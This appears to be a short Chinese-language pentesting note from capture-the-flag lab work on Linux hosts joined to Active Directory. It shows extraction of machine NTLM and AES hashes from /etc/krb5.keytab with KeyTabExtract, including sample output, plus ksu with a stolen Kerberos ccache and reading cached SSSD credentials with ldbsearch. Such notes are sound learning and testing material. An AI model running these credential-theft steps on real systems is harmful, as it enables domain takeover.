Linux SSSD
1. 介绍
在 AD 中的 Linux 机器可能会 在文件中存储不同的 CCACHE 票证。这些票证可以像其他任何 kerberos 票证一样被使用和滥用。为了读取这些票证,您需要是票证的用户所有者或 root 用户
1.1. 识别
- 文件
/etc/krb5.conf存储 Kerberos 客户端信息,这是加入域所必需的。这包括 KDC 和管理员服务器的位置、默认设置和映射。
1.2. 利用
1.2.1. 解密/etc/krb5.keytab 获取机器哈希
域内的主机必须在 /etc/krb5.keytab 处拥有 krb5.keytab 文件以进行认证过程
使用 KeyTabExtract.py
┌──(root㉿kali)-[~/Desktop/htb/Heron]
└─# git clone https://github.com/sosdave/KeyTabExtract
┌──(root㉿kali)-[~/Desktop/htb/Heron/KeyTabExtract]
└─# python keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : HERON.VL
SERVICE PRINCIPAL : FRAJMP$/
NTLM HASH : 6f55b3b443ef192c804b2ae98e8254f7
AES-256 HASH : 7be44e62e24ba5f4a5024c185ade0cd3056b600bb9c69f11da3050dd586130e7
AES-128 HASH : dcaaea0cdc4475eee9bf78e6a6cbd0cd
1.2.2. KSU 机制
ksu 二进制文件通过 Kerberos TGT 进行身份验证 → 如果 GSSAPI 验证成功, 则将 UID 切换到目标主体。(就是kerberos认证的su)
KRB5CCNAME=angela.ccache ksu angela
1.2.3. cache_credentials
查看/etc/sssd/sssd.conf 是否开启cache_credentials
如果开启,则SSSD会在本地缓存用户凭据,可在/var/lib/sss/db/ 中找到
#通过ldbsearch来查看
ldbsearch -H cache_darkcorp.htb.ldb